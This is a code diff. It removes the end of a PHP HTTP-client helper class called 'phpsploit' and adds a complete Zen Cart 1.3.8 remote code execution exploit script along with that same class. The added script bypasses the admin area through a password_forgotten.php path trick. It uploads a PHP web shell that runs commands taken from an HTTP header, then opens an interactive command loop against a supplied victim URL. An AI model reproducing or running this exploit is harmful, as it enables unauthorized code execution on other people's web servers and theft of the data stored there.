-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-		
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-	
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket,$this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @example $this->showheader()
-	 * 
-	 */
-	function showheader()
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @example $this->showcookie()
-	 * 
-	 */
-	function showcookie()
-	{
-		$this->cookie_str = '';
-		
-		if(!isset($this->cookie))
-		   return;
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->get('localhost/index.php?var=x')
-	 * @example $this->get('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => '<?php echo 1; ?>'));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->get('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$i<count($code);$i++)
-		   $this->server_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		   
-		$urlarr     = parse_url($urltarg);
-		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		if(!isset($urlarr['path']) or empty($urlarr['path']))
-		   die("Error: No path precised");
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->get($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->get($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array('');
-			break;
-				
-			case 'cookie':
-			$this->cookie = array('');
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array('');
-			$this->cookie = array('');
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-?>
-
-# milw0rm.com [2009-06-23]
+#!/usr/bin/php
+<?php
+
+#
+# ------- Zen Cart 1.3.8 Remote Code Execution
+# http://www.zen-cart.com/
+# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
+# A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
+#
+# BlackH :)
+#
+
+error_reporting(E_ALL ^ E_NOTICE);
+if($argc < 2)
+{
+echo "
+=___________ Zen Cart 1.3.8 Remote Code Execution Exploit  ____________=
+========================================================================
+|                  BlackH <Bl4ck.H@gmail.com>                          |
+========================================================================
+|                                                                      |
+| \$system> php $argv[0] <url>                                        |
+| Notes: <url>      ex: http://victim.com/site (no slash)              |
+|                                                                      |
+========================================================================
+";exit(1);
+}
+
+
+$url = $argv[1];
+$trick = "/password_forgotten.php";
+
+$xpl = new phpsploit();
+$xpl->agent("Mozilla Firefox");
+
+$real_kthxbye = remote_exec($url);
+
+# Remote Code Execution Exploit
+function remote_exec($url) {
+	global $xpl, $url, $trick;
+	
+	echo "\n[-] Remote Code Execution";
+
+	if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
+	
+	$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
+	$code = '<?php system($_SERVER["HTTP_SHELL"]); ?>';
+	
+	$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
+			"record_company_name" => "0",
+			"record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O
+											frmdt_filename => $n,
+											frmdt_content => $code));
+
+	if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
+	else die("\n[!] error - can't upload the shell\n");
+
+	print "\nrce@jah\$> ";
+
+	while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
+		$xpl->addheader('SHELL',$cmd);
+		$xpl->get($url.'/images/'.$n);	
+		print $xpl->getcontent()."\nrce@jah$> ";
+		# don't forget to "rm *.php" and exit
+		# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit" 
+		#  to clean the database (record_company & record_company_info)
+	}
+}
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.0
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+		
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+	
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket,$this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @example $this->showheader()
+	 * 
+	 */
+	function showheader()
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @example $this->showcookie()
+	 * 
+	 */
+	function showcookie()
+	{
+		$this->cookie_str = '';
+		
+		if(!isset($this->cookie))
+		   return;
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->get('localhost/index.php?var=x')
+	 * @example $this->get('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => '<?php echo 1; ?>'));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->get('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$i<count($code);$i++)
+		   $this->server_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		   
+		$urlarr     = parse_url($urltarg);
+		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		if(!isset($urlarr['path']) or empty($urlarr['path']))
+		   die("Error: No path precised");
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->get($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->get($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
